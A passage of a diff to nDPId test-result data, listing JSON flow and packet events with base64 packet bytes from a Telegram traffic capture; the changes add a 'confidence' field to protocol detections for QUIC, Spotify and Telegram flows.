AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1588779634764,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1588779634764,"pkt":"EBMx8Tl2KDc3AG3ICABFAAViUS0AAEARvOnAqAFN2DrNRMaGAbsFTkE+w1EwNDZQdSQ0JxgV+\/AAAAABpTtWGWoI4a2O5woGoAEEAENITE8ZAAAAUEFEAPUBAABTTkkAAwIAAFNUSwA5AgAAVkVSAD0CAABDQ1MATQIAAE5PTkNtAgAAQUVBRHECAABVQUlEoAIAAFNDSUSwAgAAVENJRLQCAABQRE1EuAIAAFNNSEy8AgAASUNTTMACAABOT05Q4AIAAFBVQlMAAwAATUlEUwQDAABTQ0xTCAMAAEtFWFMMAwAAWExDVBQDAABDU0NUFAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cuZ29vZ2xlLmNvbapsx9TSQuPwh8YeJs33Nmze8URvGPZoGeJQWhFImAF+FKGJcZ5Gv+AWggZjhNIH2DzcOgKswVEwNDYB6IFgkpIa6H7tgIaiFYKRXrLacjAwMDAwMDAwTrr3TE8EhubDtCHdJzdVC1d+PPBDQzIwYmV0YSBDaHJvbWUvODMuMC40MTAzLjM0IEludGVsIE1hYyBPUyBYIDEwXzEzXzYriYKzggSKpsC6slaoCl0fAAAAAFg1MDkBAAAAHgAAAIbXL08ZJ3aJ+3OQ3+Rsvbic8DCd31+92QlBmAfJ4ZcgyovDvfnINbPNV9UIgMSv\/oTfYVDM1unv0Eg0xlJTYVZkAAAAAQAAAEMyNTXvR+qpngpSje9H6qmeClKNYDLLkqBBTd8GdwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}}
 02256{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1588779634794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1588779634794,"pkt":"KDc3AG3IEBMx8Tl2CABFAAViAABAADcR1xbYOs1EwKgBTQG78hYFTlCg01EwNDYFozVJE19KlwkAAAABlFnOyl1IE6Kl9p2lJqJe20wr+YJJK3OQaQI+K1yyeZR9yLW3lS\/Tdnt9xcKqAlOjTi1OwA2w6a7+tRtr3KAKpiTPSke9Qgxq9RZuUGOobpscabZyRsqHgng7hPe2XFawQxldFDSjxKnYQdE5FFv9BpDrnq\/TTXf9TFvgw\/QnXVAz5Cyt9UqBUF1hH0e8eHxu6vo8lxkhnIhe5h6hLOoAm1BnioEr9hnRo4ORCSZRNuTGnhroEuVGyj5HhhPz45sTADcZH\/aRhJy7qwSQPpjxKMRjwHfkXW+yFpSOG3Hp5CsHedxutEJhnZDI+4BG1I6mpoDE8Zvk+SOrrxTdABEKpyABqDKs78QbQi9n46y46LF2JTAo36T9cjW0OkfnS1dX8RBGe5tpl\/GX8HAEOsAa\/z+6O4B5WSOIZhf34xGOy\/N3OFC+u9lN+ttVyLf++3WOzpd57ZzPwtC+yE\/BNwbA4eO5JHsp6kPUffzjzL5K4L4obRfRfmFzgUJr2AvlNCCKETOUv9FcgCj+O3Ce2J+FzvWWvPIvOKN37xrUN\/mjFcjn6vrnzc3WHSBHZUUQPgLL9gdUFNa8\/yQjJhbGLlt8bvQA1SJaoWXDVmYJjnjFSJJFF8RWpizfJP35dxquwrjEwUged8l6McoK7qHu4Ld19f6o8UJyTgkxjnhmujMkW40UK64Bo1F6vaXjIzepbsvzrfPs4buhFyCPcm2wLFZq5nMbYvmNgbBAMNYgQ7+Y4Zo47U6dIvcnsHay4b8rdIZC\/Ra4RUg2MEAVMY04nZVwsS9kMvxjw7tWpuLXdlQCjlvuGOf6dZ6k9rHdaI3URstXL6UuWo0Gdj\/NtiaGySmIHVV6i7EbmaJp3uFyYDnUvrIMjfc6ghlolVGsZni+GAZQbXnpWH5ualh+GQk\/IS2IEz0uyBJ6dsYticBr8EFAQR7hHY\/3OyEr27WwpwoLmUJn9UQqUUNET0+qTxL027bZTqGeTGLe2rH0z4qd78Ue12s\/mmitdGeaTOEIB+kN9Oz976ydi7i+SoMBr\/+hKLj5gjHsfiNqAK8opkFFxqyBh0nqOBdwUSl8gZVmShAcuOo649XW2Yut5pCeSZfn3ZoRq+lWx89wdySCjOMW8exEEWunv6bjn3slpy7AmRkw+sPRuDmUtrstSTMggBfN+zYz4kU9msu81pr+IK0y7aQh4mmTipBI3toWvtKGgxtFFCU+90ZF+2e26g7ax+JPhJWCf1aeqV2qjVTswyDUe+X8YVqx5YC7ACn0pIzEQj12x8eSFM60TkG8kXSrR+cBcSE4aaYhrAy3pypcCtMV26Co80JeaaDwDMCwmVAzo0E\/BwpqMknzmJBeyZjvON\/562D3ZU9nDxApe4H14sNeh3KyKanbNvTWcgxWJPs+wQ9X1d9egrD3CNpHov7eGsS9E5PTryqkw6dcr07anAdXKz39OKneC7uTIi2xMN4pi9HDUne9kKxezY6JaiaaEds0Egs5TrKu5MlMzp7QSr1MmDFu7VQLrafQLtQSQLw0f+CkdiOkRSoewADHR7WnRu3Pw\/1y7ALeor+7d7v\/xVkXtV0+u1JaX2B1bUYYuBQruUl0bp5QCHut4tI5G7u+9P1dYnUX\/rSklohEaFv70M62kLeKCl4bX8BdPalaH0yKRZF9q2iCLDdluLwx+pd3G8lRNNpU8gMggNTI9z\/7Pxs0oOqfN32KINp0rOMXmr0ZD6E5U7SeSuShxUVrIQgXkF5QTsc4zAeYQXZrfPFcKANcrPTz3MqQYdpM"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1588779634795,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1588779634795,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4emwAAEARmNTAqAFN2DrNRPIWAbsAJN5oQKM1SRNfSpcJAg\/VJy\/hU5JXfMk208XyiTI7oA=="}
 02266{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1588779634797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1588779634797,"pkt":"KDc3AG3IEBMx8Tl2CABFAAViAABAADgR1hbYOs1EwKgBTQG7xoYFTqbf01EwNDYFdSQ0JxgV+\/AAAAAB\/upOH6rH2BIyQSeP5oglrVNRjLzUPYUddHT9m6BsmcKmApdlysrOkxHuxx9vijlyM8wYkq7JvX19IQMhKJZA0U6a8sLp7rHlGFo5nqmm0jMnW7WPHt\/LNpmp9sMej9LIYl7HVWlYuGONw23gJgIuAlpWAO6yh+eVnrhPvfDTj31c6\/L1ooPLrq5NV7Gc7jNhPXAjTc4ZaIElGMpTUieuhBDEobdC\/yRUwhIJac7BNwvPjcF+IDwdoZlLRJw3R5oXAi2b\/NF4EAf1KMRYvNmplcTy11GLuiSvRAmihe5Rh\/orc2nsZbWj+vVmUmzCiWHVssa5KLzmBbkyMh6lJPB3gwNR9L\/Fq9yeGKy0+1JnwE4BdYx5u8HLnX2wgYVFT\/rFfn1Oc62CdMeazmAG7K4pybekkUnanBSVSlDsTtacnk6lBahTKCPl4BKZo41FpeNyrCv6CdLYcTHgeBE4YGrMXUeFT\/ilVEPrTMzFe5kzHIStA3AKnuB\/P+S0D02eLWMotPjv93++mmxST6HP114UWR5QNEIWRxUS8RL0hQeu4zY97Ng6cw4CKN+Csj\/ZvkP4kxD\/Zq7tP6yj9mYvYIO9zExfP9oeGiwS\/4f+6unIp0FdFoZmq8bqYOIOw8QtYVOoNnStryjcigG\/awK2ZaMXV+46Pnbc7phNOyTwsLBxxc\/12QJJ45cSQCeX9fI3HOGC6Lef+EyN3wVq9oB+wBoxI5umm0icT\/zZ2yvFo6UFJ2uDstyecW1AqbCfnn6WWrQLz6eMr+vL\/JleVbbatuBYa5gdk2Yt+67fkdck3Dk3mkph8oGaf+SDkR7Tf9p8ulHM4RwOnQJFlNf4xkSWeQGBLD6wjBE4rkLONEpat+rbynMjiBPAofixsPnISwVDLf0nq9DMrjUvdWlIIMyhGej2e24qnTkMu6p7FC\/huIoB0mRmYhHnBPlCQn\/LUzArFEcNys29X1cxw25iplZFvHkHdOc24AY5G54G00MdsxNdaE\/paJZz93dfFlaEUpxXdsPnTzUS4pfi+tXdLdZlCDSCbcoeLXsZ10o3zvR7bkNwPdSYObv6FtEohnNHd5N8A7GThnHg9zUXltLPSF3xHvq8673iVUYgBtPyG5IX44udpmQI7jeus04VvFTz2gu4npRTD34iJ0hoN0ntT0nFkqcX5\/lL09qWjNDuFP\/S1ls4UAok+2ha5s3PvhtAKIlco7aoWYLrSj95gTSsEvt+vv6BHLLnycSfEmJgy7LNVNyoUK4C4+9WgT1JfWOmVbGaY23xkwzP15QjiTTdKIEkJwiBmgJIruM0dA1J41jJPUcFpH8opFJyrh1InbMhpwrdsem5Er87sEkX0BhYPXkyvKucSZm6W1RMofNDgCdyw5TOBfDKdoqNmc54r82qBE2FvdTks67OsedSUGg\/xIKev6elshEbqcaKfcXRRyuerRJ9Na1ZC85buNS0\/0S8Uk1MnuNcWLIniDOgLmxDYioY8+6ffXPskGoeJ6mpsWIPFN\/ZXPivRS+0hFla3abk42RYHrYiht3fXvADKY3mvEEwWMSzU84L2ho8ij4vLNJYBjTvbpsEkPGMqANA85Spe5XJ9p4g9hQurfHWfSLDKdhStCgrn8jpcM\/\/FkUBZViwdPAW2JLOvsdSXQXeDGKI7nTEgI0kYpnr4frOKaPCHqb3HEqFHSRiARTSD0ufyxhTd6AYnG3WyBQ7hHD\/6lTnreRmZxISZ6q\/gFRJTubvR8\/BO8IvV1XaeMgD55oE\/mi7ALMHyuc8OmMt"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1588779634797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1588779634797,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4M8YAAEAR33rAqAFN2DrNRMaGAbsAJKIhQHUkNCcYFfvwAo2OXEY+ceV4qFvU3oSjW1YxGw=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1588779636498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1588779636498,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABIkKQAAEARZWTAqAFNwKgB\/+EV4RUANJmxU3BvdFVkcDBukus1wI\/JPgABAARIlcIDfp+BivWMmwGHLE6mtUd\/uj\/4zNc="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABETKwAAEARCJTAqAFNW2wICG32AhEAMEyhL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8Sf7Krq21RXQ=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEp8EAAEARpYXAqAFNW2wQAW32AhEAMJ\/zL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9gDcREEDsyHQ=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABE6yEAAEARZiPAqAFNW2wMA232AhIAMCHWL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+2+xugMe3kOw=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEy+YAAEARiWDAqAFNW2wIAW32AhUAMEz1L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+LrTXW6BYYCg=="}
